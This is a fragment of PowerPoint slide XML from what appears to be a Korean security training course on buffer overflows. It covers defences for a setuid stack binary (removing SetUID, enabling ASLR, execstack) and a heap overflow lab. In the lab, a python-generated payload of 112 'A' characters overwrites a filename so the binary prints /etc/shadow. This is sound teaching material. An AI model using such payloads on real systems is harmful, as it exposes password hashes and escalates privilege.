            <a:ext cx="565945" cy="5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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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쉘코드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실행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-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대응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/stack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파일에는 스택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취약점이 존재한다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오버플로우를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통해 쉘 코드가 실행되지 않도록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대응하시오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test / test123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접근 권한 변경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접근권한 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ASLR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sysctl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 kernel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randomize_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va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc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space=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 실행 방지 설정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execstack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-c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Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{139A787F-55D9-4280-A8E7-48BDE3B12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C3DFF4-2FD7-4BB3-B403-C968BA8BCA13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5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 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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95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이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="0" dirty="0" err="1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쉘코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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주입 및 실행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="95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95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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="95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쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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주입 공격에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="95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5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D80CE4A-C2E9-4560-8E50-EB848B2EAE7C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C3017B1-DBDF-418B-BC4C-BD9FA0CFACFC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1" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0DE2446-C02B-47FA-9538-513B519A1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4D0FFD-0653-4F8F-8056-CFE9FBC86D85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5.11, 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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6B0DA0-CF87-4217-BA6E-21FF424C1CDB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C50A4C0-C1BB-4488-87A0-07928015F51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8F201F-2885-494C-B5EA-7C4A69EAB1A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화살표: 오른쪽 25">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D75FCD-6725-40D7-A146-4937F85BA7B7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2146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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제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u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack* 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3) ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>스택 실행 방지 설정 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execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack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execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7DBDD6-CBB4-41A5-9432-8FEB5F7C7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833966"/>
            <a:ext cx="4727194" cy="5410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86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661EAAE-E448-42C9-A743-DC8DACC6B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11" r="2302" b="19042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="2149362"/>
            <a:ext cx="4958142" cy="641521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A759F0-00FE-4ADB-B599-D6E8C0B1728C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483152" y="2880142"/>
          <a:ext cx="4932807" cy="2443353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16327748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18803"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20122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SetUID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해제 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stack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실행하면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쉘코드가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실행되기는 하지만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root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권한이 아닌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stack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실행한 계정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 그림의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권한을 가지는 쉘이 나타난다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16622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53249" name="_x1658446056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A57FB5-7F34-409E-850A-FA077295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19" y="3671797"/>
            <a:ext cx="4779963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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6A4311-731E-4CA8-BFC4-6D2BBC40C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52" y="5773673"/>
            <a:ext cx="4983480" cy="5562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E78BD65-C113-4787-9C38-CB1A8A9FEA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6282989" y="470112"/>
          <a:ext cx="4932807" cy="3174175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956352289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56180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="26866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ASLR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 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stack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실행하면 실행시마다 주소가 변경되어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쉘코드가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실행되지 않는다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공격자는 스크립트 등을 사용하여 성공할 때까지 반복함으로써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쉘코드를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실행시킬 수도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66370" marR="0" indent="-16637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49480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53251" name="_x617035992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9E9A5-A524-47B8-B9D1-99DEDA946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" t="325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384472" y="1719795"/>
            <a:ext cx="4742542" cy="176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90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE4F803-2A1D-408C-BE49-1E5975DE82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2989" y="4521813"/>
            <a:ext cx="4503420" cy="54102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5FC0D6E-5653-432A-B10A-3E0EDD8A38AB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257331A-9C23-4EF9-BF76-BD7F10A19E7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E410D5-8201-4E91-8981-B9EA3BFD0B7D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2F274F48-80C7-42DF-A2A9-14023AB1B654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0521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C4553F-CF47-4982-BAED-66DAB834C2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="620276" y="498663"/>
          <a:ext cx="4932807" cy="2930335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86291740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016968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="25204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스택 실행 방지 설정 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stack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실행하면 스택 내에 존재하는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쉘코드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자체의 실행이 불가능하게 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416208"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56321" name="_x1658344864">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AC8636-B837-4BB9-B28F-49DD5F96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60" y="1311503"/>
            <a:ext cx="4770438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E17C4A-3B31-4DDC-AF8F-C53104642EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="368998"/>
            <a:ext cx="5616792" cy="612000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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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A4EFB41-A839-4942-B067-E5C42D9F4F16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3795B63-DDAA-4482-B875-5A0C980BA18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690D8B-DF94-4BFB-9CDD-FAAEFD112596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화살표: 오른쪽 11">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8F88F4-67B1-4644-816D-F049F6B74543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1460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/Training/Unit/Sys/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. BOF -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힙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/bof64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 존재하는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취약점을 이용하여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/etc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/shadow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파일의 내용을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출력하시오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test / test123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BOF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수행할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 err="1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BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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취약점에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0"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FEFB03D-34B9-4EE6-85B6-79AF701BA0F5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0C0A1CA-A354-4356-922E-F509B5745B6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F83B7B-F873-4C64-A599-22B2D19FCB7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7C74A80-9583-4D92-800C-344EF6D87B88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88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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B355A65-614F-401A-B129-C717D9789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34" y="924349"/>
            <a:ext cx="4594860" cy="5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E070F3A2-B311-45EC-847A-FC2D9F8F0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37" y="2386275"/>
            <a:ext cx="4617720" cy="800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5A57801-35B0-4CFA-BF2E-0C3E36B41F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556470" y="3347160"/>
          <a:ext cx="4932807" cy="98018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484872426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접근 권한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103813"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6410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읽기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(r) = 4,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쓰기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(w) = 2,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실행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조합하여 접근 권한을 설정한다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예를 들어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쓰기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권한을 모두 부여하는 경우에는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7(4 + 2 + 1)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지정하고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읽기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권한만 부여하는 경우에는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5(4 + 1)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지정한다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67270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1) /bin/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stty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접근 권한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rwsr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sr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-x)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소유자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(root)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ls –l /bin/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stty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dirty="0"/>
              <a:t>2) /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 접근 권한 변경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rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-x-r-x) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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755 /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty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3) /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 소유자 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93E2FFA-2307-4CB3-8A4F-B1B3CDB20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34" y="5334930"/>
            <a:ext cx="4556760" cy="70866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check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 및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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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93A3F0-E427-4772-84A2-D041740BAFF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20DFAB4-2444-4459-BEB0-41EF90983574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A31CA8-E669-490E-95FF-9541F3329BA3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화살표: 오른쪽 14">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B881AF4-F56D-4697-AB59-ADEE16D6AF5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93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sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있음을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ls –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l heap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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.c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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/goodfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>cat goodfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 실행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>AAAA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/>
              <a:t>※ username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>블록과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>블록 간의 거리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x70(=112) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트임을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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571A0F24-991F-415E-A73C-B4EAAC477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50" y="1308062"/>
            <a:ext cx="3931920" cy="678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94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E16244EA-4DD3-4DB4-82AB-E12B21602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50" y="2572320"/>
            <a:ext cx="4954143" cy="2751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96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEE197C-F394-412F-8A5A-427406107D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5" t="7386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505350" y="5778500"/>
            <a:ext cx="3059320" cy="501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98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE075564-BEE4-4DC3-AF46-CA34416639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7" t="2533" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303893" y="852446"/>
            <a:ext cx="3729355" cy="126259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2514E9-35C9-4437-B2C6-2C1F069FC0E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6303893" y="2416397"/>
          <a:ext cx="4932807" cy="2686495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588396129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12301"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="219202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strcpy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실행 후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힙의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구조는 다음과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114587"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57345" name="_x570528760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D34F5E5-1CDA-4753-B23F-F4B742DB7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727" y="3007517"/>
            <a:ext cx="4783138" cy="188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8EF467-838B-401E-8C44-EF9C0969A91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887E6CE-FA27-4E84-A8B5-629D20E6744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B57CA6-41C8-4B86-8288-641600675A0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화살표: 오른쪽 13">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E42FEDF-AC64-48DC-8741-0850E5A3D2C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2064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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>힙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정할 수 있음을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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*112+"B"') &gt; 1.txt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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위의 실행 결과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cat 1.txt</a:t>
            </a:r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※ B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>라는 파일을 열 수 없었음을 확인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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 내용이 출력되도록 공격 수행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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$(python -c 'print "A"*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>112+"/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow"') &gt; 2.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD377966-9EB2-46A2-8812-AD29643EC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" t="323" r="721" b="158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="504826" y="862012"/>
            <a:ext cx="4852987" cy="2705101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19AB127-0D1E-49DE-AA80-E2C09252F5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="504826" y="3632427"/>
          <a:ext cx="4932807" cy="278427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563084074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2552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791167"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
